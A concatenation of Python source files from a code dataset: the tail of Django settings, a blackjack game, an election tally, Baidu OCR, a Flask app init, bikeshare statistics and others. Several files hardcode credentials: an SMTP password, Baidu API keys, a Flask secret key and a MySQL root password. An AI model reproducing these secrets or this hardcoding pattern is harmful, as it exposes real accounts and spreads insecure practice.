'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n # 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'pinry.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = 'wsgi.application'\n\n\n\n# MESSAGE_TAGS = {\n# messages.WARNING: 'alert alert-warning',\n# messages.ERROR: 'alert alert-danger',\n# messages.SUCCESS: 'alert alert-success',\n# messages.INFO: 'alert alert-info',\n# }\n\nAPI_LIMIT_PER_PAGE = 20\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n # Uncomment the next line to enable the admin:\n 'django.contrib.admin',\n # Uncomment the next line to enable admin documentation:\n 'django.contrib.admindocs',\n\n 'south',\n 'taggit',\n 'compressor',\n 'django_images',\n 'pinry.core',\n # 'pinry.users',\n 'pinry.ads',\n\n # 'pinry.userena',\n 'guardian',\n # 'easy_thumbnails',\n 'pinry.newuser',\n)\n\nIMAGE_PATH = 'pinry.core.utils.upload_path'\nIMAGE_SIZES = {\n 'thumbnail': {'size': [240, 0]},\n 'standard': {'size': [600, 0]},\n 'square': {'crop': True, 'size': [125, 125]},\n}\n\n#很关键的一句'pinry.core.context_processors.template_settings'为setting传到模板\n#下面的几句结合TemplateView.as_view\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'pinry.core.context_processors.template_settings',\n #上面一句向base.html传值settings.API_LIMIT_PER_PAGE\n)\n\n\nSESSION_SERIALIZER = 'django.contrib.sessions.serializers.JSONSerializer'\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n }\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n}\n\n\nAUTHENTICATION_BACKENDS = (\n # 'userena.backends.UserenaAuthenticationBackend',\n 'guardian.backends.ObjectPermissionBackend',\n 'django.contrib.auth.backends.ModelBackend',\n )\n\n\n# Email settings\nEMAIL_BACKEND = 'django.core.mail.backends.dummy.EmailBackend'\n\nEMAIL_HOST = 'smtp.163.com'\nEMAIL_PORT = 25\nEMAIL_HOST_USER = 'pythontake@163.com'\nEMAIL_HOST_PASSWORD = 'T78325694'\nEMAIL_USE_TLS = True\nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER \n\n\n# APPEND_SLASH = False\n\nTASTYPIE_SWAGGER_API_MODULE = 'api.urls.v3'\n","sub_path":"adleida_web_site/pinry/pinry/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"431956592","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport codecs\nimport os\n\ntry:\n import re2 as re\nexcept ImportError:\n import re\n\nDATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'data')\n\ndef to_unicode(obj, encoding='utf-8'):\n if isinstance(obj, basestring):\n if not isinstance(obj, unicode):\n obj = unicode(obj, encoding)\n return obj\n\n\ndef get_mapping(filename):\n try:\n wordfile = codecs.open(os.path.join(DATA_DIRECTORY, filename), 'r',\n encoding='utf-8')\n worddict = {}\n for line in wordfile:\n line = line.strip()\n if line:\n (find, replace) = line.split('=>')\n worddict[find.strip()] = replace.strip()\n return worddict\n except IOError:\n return {}\n\n\ndef multisub(text, filename):\n dictionary = get_mapping('%s.txt' % filename)\n for (find, replace) in dictionary.items():\n pattern = re.compile(r'(?i)\\b%s\\b' % find)\n text = re.sub(pattern, replace, to_unicode(text))\n return text\n","sub_path":"multisub.py","file_name":"multisub.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"198068360","text":"__author__ = 'Tom Van den Eede'\n__copyright__ = 'Copyright 2018-2020, Palette2 Splicer Post Processing Project'\n__credits__ = ['Tom Van den Eede',\n 'Tim Brookman'\n ]\n__license__ = 'GPLv3'\n__maintainer__ = 'Tom Van den Eede'\n__email__ = 'P2PP@pandora.be'\n__status__ = 'BETA'\n\n\n# general version info\nMajorVersion = 4\nMinorVersion = 16\nBuild = 0\n\n\nlatest_stable_version = \"\"\n\nVersion = \"{}.{:02}.{:03}\".format(MajorVersion, MinorVersion, Build)\n\n##################################\n# UPDATE FILES FOR CURRENT VERSION\n##################################\n# zip_file=p2pp_mac.zip\n","sub_path":"version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"326705346","text":"#!/usr/bin/env python3\n#\n# Mitch Torrens (c) 2019\n#\n\n\"\"\"\nA command line blackjack game\n\"\"\"\n\nimport sys\nimport argparse\nimport random\nimport json\n\nfrom collections import namedtuple\nfrom enum import Enum\n\nCard = namedtuple('Card', 'rank suit')\n\nclass Rank(Enum):\n ace = 1\n two = 2\n three = 3\n four = 4\n five = 5\n six = 6\n seven = 7\n eight = 8\n nine = 9\n ten = 10\n jack = 11\n queen = 12\n king = 13\n\nclass Suit(Enum):\n clubs = 1\n diamonds = 2\n hearts = 3\n spades = 4\n\nclass Deck:\n _cards = []\n for s in Suit:\n for r in Rank:\n _cards.append(Card(r, s))\n\n def __init__(self):\n pass\n\n def __iter__(self):\n for card in self._cards:\n yield card\n\nclass Table:\n\n _shoe = []\n\n def __init__(self, num_decks, num_cut_decks):\n self._num_decks = num_decks\n self._num_cut_decks = num_decks\n\n for _ in range(num_decks):\n self._shoe.extend(Deck())\n\n \n\n\nclass Player:\n \n hands = []\n\n def __init__(self, name, bankroll=1000):\n self._name = name\n self._bankroll = bankroll\n\n def __str__(self):\n return \"Player {}, bankroll {}\".format(self._name, self._bankroll)\n\n def bet(self, num_chips):\n if num_chips > self._bankroll:\n num_chips = self._bankroll\n print(\"{} has insufficient funds. Making max bet of {}\".format(self._name, num_chips))\n \n# TODO: Encapsulate this better\ndef display(table, players):\n\n if table.out_format == 'json':\n print(json.dumps(table.__dict__))\n for p in players:\n print(json.dumps(p.__dict__))\n else:\n for p in players:\n print(p)\n\n\ndef play(table, players):\n\n table.deal(players)\n display(table, players)\n\n for p in players:\n pass\n\ndef main(argv=()):\n\n # Parse command line arguments\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('num_players', nargs='?', const=1, type=int, choices=range(1,7), \n help='The number of players (default 1)')\n parser.add_argument('-n', type=str, nargs='*', help=\"The names of each player\")\n bankrolls = parser.add_argument('-b', type=int, nargs='*', \n help=\"The starting bankrolls for each player (default 1000 chips)\")\n parser.add_argument('-d', type=int, default=1, choices=range(1,9), \n help=\"The number of 52-card decks used by the dealer (default 1 deck)\")\n parser.add_argument('-c', type=float, \n help=\"\"\"The number of 52-card decks cut out of the shoe, \n prompting the dealer to shuffle (default 1/4 of the deck)\"\"\")\n \n args = parser.parse_args(argv)\n\n if (len(args.b) > 1 and len(args.b) != args.num_players):\n # TODO: Investigate better integrating error into argparse, so that output matches built-in errors\n raise argparse.ArgumentError(bankrolls, \"unexpected number of starting bankroll arguments\")\n\n players = []\n for p in range(args.num_players):\n if p < len(args.n):\n name = args.n[p]\n else:\n name = 'Player {}'.format(p+1)\n if p < len(args.b):\n bankroll = args.b[p]\n else:\n bankroll = args.b[0]\n\n players.append(Player(name, bankroll))\n\n table = Table(args.d, args.c)\n\n #while False:\n play(table, players)\n \n return 0\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"Blackjack/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"87323662","text":"# Dependencies\nimport csv\nimport os\nimport pandas as pd\n\nelection_data = os.path.join(\"Resources/election_data.csv\")\n\ncandidates = []\ntotal_votes = 0\nvote_count = []\npercent_votes = []\n\n\nwith open(election_data) as election_data:\n reader = csv.DictReader(election_data)\n\n for row in reader:\n total_votes = total_votes + 1\n total_candidates = row[\"Candidate\"] \n\n#Add candidates name to list, if not in the list, and add votes. \n\n if row[\"Candidate\"] not in candidates:\n \n candidates.append(row[\"Candidate\"])\n index = candidates.index(row[\"Candidate\"])\n vote_count.append(1)\n\n#If the name exists in the list, add votes to that person's name.\n else:\n index = candidates.index(row[\"Candidate\"])\n vote_count[index] +=1\n\n#Determine the % vote for each Candidate on the list\n for votes in vote_count:\n percentage = (votes/total_votes)\n percentage = \"{:.1%}\".format(percentage)\n percent_votes.append(percentage)\n\n#print(candidates)\n#print(vote_count)\n#print(percent_votes)\n\n#Find the winner\ncandidate_df = {\"Candidate_names\": candidates,\"Votes Per Candidate\":vote_count}\ncandidate_df2=pd.DataFrame(candidate_df)\ncandidate_df3 = candidate_df2.sort_values(\"Votes Per Candidate\", ascending = False)\nwinner = candidate_df3.head(1)\n\n#Print\n#Print Financial Analysis info\nprint(\"Election Results\")\nprint(\"---------------------\")\nprint(f\"Total Votes: {str(total_votes)}\")\nprint(\"---------------------\")\nline1 = \"Election Results\"\nline2 = \"---------------------\"\nline3 = str(f\"Total Votes: {str(total_votes)}\")\nline4 = \"---------------------\"\nline5 = \"\"\nfor x in range (4):\n print(f\"{str(candidates[x])}: {str(percent_votes[x])} ({str((vote_count[x]))})\")\n line5 += str(f\"{str(candidates[x])}: {str(percent_votes[x])} ({str((vote_count[x]))})\\n\")\nline6 = \"---------------------\"\nline7 = str(f\"Winner: {winner['Candidate_names'].values}\")\n\noutput = open(\"output.txt\", \"w\")\noutput.write('{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n{}\\n'.format(line1,line2,line3,line4,line5,line6,line7))\n\nprint(\"---------------------\")\n#print(f\"Winner: {str(winner)}\")\nprint(f\"Winner: {winner['Candidate_names'].values}\")","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"482890740","text":"#!/usr/bin/env python3\n'''\nTime the update rate\n\nCopyright (C) 2020 Simon D. Levy\n\nMIT License\n'''\n\nimport gym\nfrom time import time\n\nNITER = 10000\n\nif __name__ == '__main__':\n\n # Create and initialize the simplest copter environment (on/off motors)\n env = gym.make('gym_copter:Copter-v0')\n env.reset()\n\n start = time()\n\n # Loop a bunch of times\n for k in range(NITER):\n\n # Run full-throttle\n env.step([1])\n\n del env\n\n print('%d fps' % (int(NITER/(time()-start))))\n","sub_path":"examples/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"544909635","text":"\n\nfrom xai.brain.wordbase.verbs._expedite import _EXPEDITE\n\n#calss header\nclass _EXPEDITES(_EXPEDITE, ):\n\tdef __init__(self,): \n\t\t_EXPEDITE.__init__(self)\n\t\tself.name = \"EXPEDITES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"expedite\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_expedites.py","file_name":"_expedites.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"121171498","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 22 01:48:06 2018\n\n@author: chengxue\n\"\"\"\nimport active_subspaces as ac\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\ndef Original_ActiveSubspace(fun,input_range,training_points,testing_points,number_of_gradient,approximation_dimension):\n\n training_points = training_points[:number_of_gradient]\n f = fun(training_points).reshape(len(training_points),1)\n\n #construct the active subspace\n ss = ac.subspaces.Subspaces()\n df = ac.gradients.finite_difference_gradients(training_points, fun) #here I use finite difference to find the gradient \n ss.compute(df=df)\n #plot the eigvectors\n# ac.utils.plotters.eigenvalues(ss.eigenvals)\n \n #quadratic polynomial approximation\n RS = ac.utils.response_surfaces.PolynomialApproximation(2)\n #Train the surface with active variable values (y = XX.dot(ss.W1)) and function values (f)\n y = training_points.dot(ss.W1)\n RS.train(y, f)\n\n testing_y = testing_points.dot(ss.W1)\n# testing_y = testing_y.reshape(len(testing_y),testing_y.shape[1])\n\n y_estimate = RS.predict(testing_y)[0]\n y_true = (fun(testing_points))\n MSE = mean_squared_error(y_estimate, y_true) \n \n \n# print(\"***********************\")\n# print(\"Original method MSE:\",MSE)\n# print(\"***********************\")\n return MSE","sub_path":"codes/functions used in the thesis/final method/original_method.py","file_name":"original_method.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"230299538","text":"from aip import AipOcr\n\n\"\"\" 你的 APPID AK SK \"\"\"\nAPP_ID = '10723084'\nAPI_KEY = 'l1ddO816pvSukFhHOrfdnty7'\nSECRET_KEY = '54tSUS2u8IHdrpObaVVZXckNmGK0PBAl'\n\nclient = AipOcr(APP_ID, API_KEY, SECRET_KEY)\n\"\"\" 读取图片 \"\"\"\n\n\ndef get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n return fp.read()\n\n\ndef image_orc(url):\n msg = \"\"\n \"\"\" 如果有可选参数 \"\"\"\n options = {\"detect_direction\": \"true\", \"detect_language\": \"false\"}\n \"\"\" 带参数调用网络图片文字识别, 图片参数为远程url图片 \"\"\"\n info = client.webImageUrl(url, options)\n if \"words_result_num\" in info and info[\"words_result_num\"] > 0:\n for text in info[\"words_result\"]:\n msg = text + \"\\n\"\n print(msg)\n return msg\n else:\n return \"识别错误\"\n\n\nif __name__ == '__main__':\n url = \"http://p1.gexing.com/G1/M00/FB/F2/rBACFFI7yr_yD7a9AABZATC8j00783.jpg\"\n image_orc(url)\n","sub_path":"AipOcr.py","file_name":"AipOcr.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"314995465","text":"import time\nimport pandas as pd\nimport numpy as np\n\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n print('\\nPlease choose one of the following cities to analyze by typing the full city name\\n')\n city = input('Chicago, New York City, Washington: ').lower()\n print('\\nYou have requested: ',city.capitalize())\n if city not in ('chicago', 'new york city', 'washington'):\n print('\\nWARNING: This is not an appropriate choice, please choose again.\\n\\n')\n else:\n break\n # TO DO: get user input for month (all, january, february, ... , june)\n print('\\nPlease choose a month to filter, or type in \"all\" for all months\\n')\n while True:\n month = input('January, February, March, April, May, June, or all: ').lower()\n print('\\nYou have requested: ',month.capitalize())\n if month not in ('january','february','march','april','may','june','all'):\n print('\\nWARNING: This is not an appropriate month/filter, please choose again.\\n\\n')\n else:\n break\n # TO DO: get user input for day of week (all, monday, tuesday, ... sunday)\n print('\\nPlease choose a day to filter or \"all\" for no filters\\n')\n while True:\n day = input('Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, Sunday, All: ').lower()\n print('\\nYou have requested: ',day.capitalize())\n if day not in ('monday','tuesday','wednesday','thursday','friday','saturday','sunday','all'):\n print('\\nWARNING: This is not an appropriate day/filter, please choose again.\\n\\n')\n else:\n break\n input('\\nPress Enter to Start the various calculations...')\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n df = pd.read_csv(CITY_DATA[city])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n input('\\nPress 
Enter to display The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n \n # TO DO: display the most common month\n common_month = df['month'].mode()[0]\n print('The most Common Month was: ', common_month)\n \n\n # TO DO: display the most common day of week\n common_day = df['day_of_week'].mode()[0]\n print('The most Common Day was: ', common_day)\n\n # TO DO: display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n common_hour = df['hour'].mode()[0]\n print('The most Common Hour was: ',common_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n input('\\nPress Enter to display The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # TO DO: display most commonly used start station\n common_start_station = df['Start Station'].value_counts().idxmax()\n print('The most commonly used start station was: ',common_start_station)\n\n # TO DO: display most commonly used end station\n common_end_station = df['End Station'].value_counts().idxmax()\n print('The most commonly used end station was: ',common_end_station)\n\n # TO DO: display most frequent combination of start station and end station trip\n Combo_Start_stop_station = df.groupby(['Start Station', 'End Station']).count()\n print('The most commonly used combination of Start and End Station was: ', common_start_station, \" & \", common_end_station)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n input('\\nPress Enter to display Trip Duration...\\n')\n start_time = time.time()\n\n # TO DO: display total travel time\n Total_Travel_Time = sum(df['Trip Duration'])\n print('Total Travel Time: ',round(Total_Travel_Time/86400,2),\" Days\")\n\n # TO DO: display mean travel time\n Mean_Travel_Time = df['Trip Duration'].mean()\n print('The Mean travel time is: ', round(Mean_Travel_Time/60,2), \" Minutes\")\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n input('\\nPress Enter to display User Stats...\\n')\n start_time = time.time()\n\n # TO DO: Display counts of user types\n user_types = df['User Type'].value_counts()\n print('Count of User Types: ', user_types)\n\n # TO DO: Display counts of gender\n try:\n gender_type = df['Gender'].value_counts()\n print('\\nGender Types:\\n', gender_type)\n except KeyError:\n print('\\nGender Types: SORRY, this data was not available based on your requested filters')\n \n\n # TO DO: Display earliest, most recent, and most common year of birth\n try:\n Earliest_Year = df['Birth Year'].min()\n print('\\nEarliest Year of Birth: ', round(Earliest_Year,0))\n except KeyError:\n print('\\nEarliest Year of Birth: SORRY, this data was not available based on your requested filters')\n \n try:\n Most_Recent_Year = df['Birth Year'].max()\n print('\\nMost Recent Year of Birth: ', round(Most_Recent_Year,0))\n except KeyError:\n print('\\nMost Recent Year of Birth: SORRY, this data was not available based on your requested filters')\n \n try:\n Most_Common_Year = df['Birth Year'].value_counts().idxmax()\n print('\\nMost Common Year of Birth: ', round(Most_Common_Year,0))\n except KeyError:\n print('\\nMost Common Year of Birth: SORRY, this data was not available based on 
your requested filters')\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef get_raw_data(df):\n \"\"\" This function is created to display upon request by the user in this manner: \n Script should prompt the user if they want to see 5 lines of raw data.\n If the answer is \"Yes\", continue this prompt and display the raw data until the user says \"No\"\n \"\"\"\n start_row = 0\n end_row = 5\n \n Show_5 = input('Would you like to see 5 lines of raw data? (Y/N): ').lower() \n if Show_5.lower() =='y':\n while True:\n print(df.iloc[start_row:end_row,:])\n start_row += 5\n end_row += 5\n Stop_5 = input('\\nWould you like to see 5 more? (Y/N): ').lower()\n if Stop_5.lower() == 'n':\n break\n else:\n continue\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n get_raw_data(df)\n\n restart = input('\\nWould you like to restart? Enter \"yes\" or \"no\": ')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"594210406","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nfrom flask_moment import Moment\nfrom flask_mail import Mail\nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp=Flask(__name__)\n\nmoment = Moment(app)\n\napp.config['SECRET_KEY']='\\x00\\xe9\\xab\\xe7n\\xb9\\x03.0\\xa3\\xae\\x92\\x10>\\xbf\\x7f\\x16\\x8b;X9\\xf1\\xfd\\xd2\\x88\\x97\\xfa\\x993j'\napp.config['SQLALCHEMY_DATABASE_URI']='mysql+pymysql://root:tokelee@localhost:3306/todo'\napp.config['SQLALCHEMY_ECHO']=True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS']=False\napp.debug = True\n#mail--configuration\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\napp.config['MAIL_USE_SSL'] = False\napp.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')\napp.config['MAIL_USERNAME'] = os.environ.get('MAIL_PASSWORD')\n\n\ndb=SQLAlchemy(app)\nmail = Mail(app)\ntoolbar=DebugToolbarExtension(app)\n\n\nlogin_manager=LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view='login'\n\nfrom todo import route","sub_path":"todo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"112823833","text":"from geonode.maps.models import Map, Layer, MapLayer, Contact, ContactRole, Role\nfrom django.contrib import admin\n\nclass MapLayerInline(admin.TabularInline):\n model = MapLayer\n\nclass ContactRoleInline(admin.TabularInline):\n model = ContactRole\n\nclass ContactRoleAdmin(admin.ModelAdmin):\n model = ContactRole\n list_display_links = ('id',)\n list_display = ('id','contact', 'layer', 'role')\n list_editable = ('contact', 'layer', 'role')\n\nclass MapAdmin(admin.ModelAdmin):\n inlines = [MapLayerInline,]\n\nclass ContactAdmin(admin.ModelAdmin):\n inlines = [ContactRoleInline]\n\nclass LayerAdmin(admin.ModelAdmin):\n list_display = ('id', 'typename','service_type','title', 'date', 'topic_category')\n list_display_links = ('id',)\n list_editable = ('title', 'topic_category')\n list_filter = ('date', 'date_type', 'constraints_use', 'topic_category')\n filter_horizontal = ('contacts',)\n date_hierarchy = 'date'\n readonly_fields = ('uuid', 'typename', 'workspace') \n inlines = [ContactRoleInline]\n\nadmin.site.register(Map, MapAdmin)\nadmin.site.register(Contact, ContactAdmin)\nadmin.site.register(Layer, LayerAdmin)\nadmin.site.register(ContactRole, ContactRoleAdmin)\nadmin.site.register(MapLayer)\nadmin.site.register(Role)\n","sub_path":"src/GeoNodePy/geonode/maps/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"97395605","text":"import concurrent.futures\nfrom typing import Optional, Type, MutableSet, Union, Iterable, Set\n\nfrom abc import ABCMeta, abstractmethod\nfrom operator import methodcaller\n\nfrom dss.index.bundle import Bundle, Tombstone\nfrom dss.util.types import LambdaContext\n\n\nclass IndexBackend(metaclass=ABCMeta):\n \"\"\"\n An abstract class defining the interface between the data store and a particular document database for the\n purpose of indexing and querying metadata associated with bundles and the files contained in them.\n \"\"\"\n def __init__(self, context: LambdaContext, dryrun: bool = False, notify: Optional[bool] = True) -> None:\n \"\"\"\n Create a new index backend.\n\n :param dryrun: if True, log only, don't make any modifications to the index\n\n :param notify: False: never notify\n None: notify on changes\n True: always notify\n \"\"\"\n self.dryrun = dryrun\n self.notify = notify\n self.context = context\n\n @abstractmethod\n def index_bundle(self, bundle: Bundle):\n \"\"\"\n Update the index with the data from the specified bundle.\n \"\"\"\n raise NotImplementedError()\n\n @abstractmethod\n def remove_bundle(self, bundle: Bundle, tombstone: Tombstone):\n \"\"\"\n Remove a given bundle's data from the index, optionally replacing it with that from the specified tombstone.\n \"\"\"\n raise NotImplementedError()\n\n def __repr__(self) -> str:\n return f\"{type(self).__name__}(dryrun={self.dryrun}, notify={self.notify})\"\n\n\nclass CompositeIndexBackend(IndexBackend):\n \"\"\"\n An index backend that delegates to multiple underlying backends, concurrently so where applicable.\n \"\"\"\n def __init__(self,\n executor: concurrent.futures.ThreadPoolExecutor,\n backends: Iterable[Union[IndexBackend, Type[IndexBackend]]],\n timeout=None,\n *args, **kwargs) -> None:\n \"\"\"\n :param executor: the executor to be used for delegating operations to all underlying backends in parallel\n\n :param backends: the backends to delegate to. Can be a mix of backend classes and instances. Any class will be\n instantiated with args and kwargs, an instance will be used as is.\n\n :param timeout: see :py:meth:`.timeout`\n\n :param args: arguments for the constructor of the super class and any backend classes in `backends` (or all\n registered backend classes if `backends` is None).\n\n :param kwargs: keyword arguments for the same purpose as `args`\n \"\"\"\n super().__init__(*args, **kwargs)\n self._timeout = timeout\n self._executor = executor\n\n def make_backend(backend: Union[IndexBackend, Type[IndexBackend]]) -> IndexBackend:\n if isinstance(backend, IndexBackend):\n return backend\n elif issubclass(backend, IndexBackend):\n return backend(*args, **kwargs)\n else:\n raise ValueError(f\"Not an instance or subclass of {IndexBackend.__name__}\")\n\n self._backends = set(map(make_backend, backends))\n\n @property\n def timeout(self):\n \"\"\"\n The time in which concurrently executed operations have to be completed by all underlying backends. If a\n backend operation does not complete within the specified timeout, an exception will be raised. 
A value of\n None disables the timeout, potentially causing the calling thread to block forever.\n \"\"\"\n return self._timeout\n\n @timeout.setter\n def timeout(self, timeout):\n \"\"\"\n Modify the timeout for the next backend operation.\n \"\"\"\n assert timeout is None or timeout > 0\n self._timeout = timeout\n\n def index_bundle(self, *args, **kwargs):\n self._delegate(self.index_bundle, args, kwargs)\n\n def remove_bundle(self, *args, **kwargs):\n self._delegate(self.remove_bundle, args, kwargs)\n\n def _delegate(self, method, args, kwargs):\n timeout = self._timeout # defensive copy\n fn = methodcaller(method.__name__, *args, **kwargs)\n future_to_backend = {self._executor.submit(fn, backend): backend\n for backend in self._backends}\n done, not_done = concurrent.futures.wait(future_to_backend.keys(), timeout=timeout)\n results = {}\n problems = []\n for future in not_done:\n backend = future_to_backend[future]\n problems.append(f\"Backend {backend} timed out\")\n for future in done:\n exception = future.exception()\n backend = future_to_backend[future]\n if exception is None:\n results[backend] = future.result()\n else:\n problems.append(f\"Backend {backend} raised an exception: {exception}\")\n if problems:\n raise RuntimeError(f\"One or more backends failed: {problems}\")\n return results\n","sub_path":"dss/index/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"400076464","text":"import tensorflow as tf\n\n\ndef saveDemo():\n x1 = tf.placeholder(dtype=tf.float32,shape=[],name='x1')\n x2 = tf.placeholder(dtype=tf.float32,shape=[],name='x1')\n w = tf.Variable(tf.constant(2.),name='W')\n w2 = tf.Variable(tf.constant(2.), name='W')\n ytmp = tf.multiply(w,x1,name='ytemp')\n y = tf.add(ytmp,x2,name='y')\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n ypred = sess.run(y,feed_dict={x1:1,x2:2})\n saver = tf.train.Saver()\n saver.save(sess,'test/model')\n\ndef import_graph():\n sess = tf.Session()\n saver = tf.train.import_meta_graph('test/model.meta')\n saver.restore(sess,'test/model')\n graph = tf.get_default_graph()\n print(tf.global_variables())\n\n\nif __name__ == '__main__':\n # saveDemo()\n import_graph()\n","sub_path":"tensorflow/saveGraph.py","file_name":"saveGraph.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
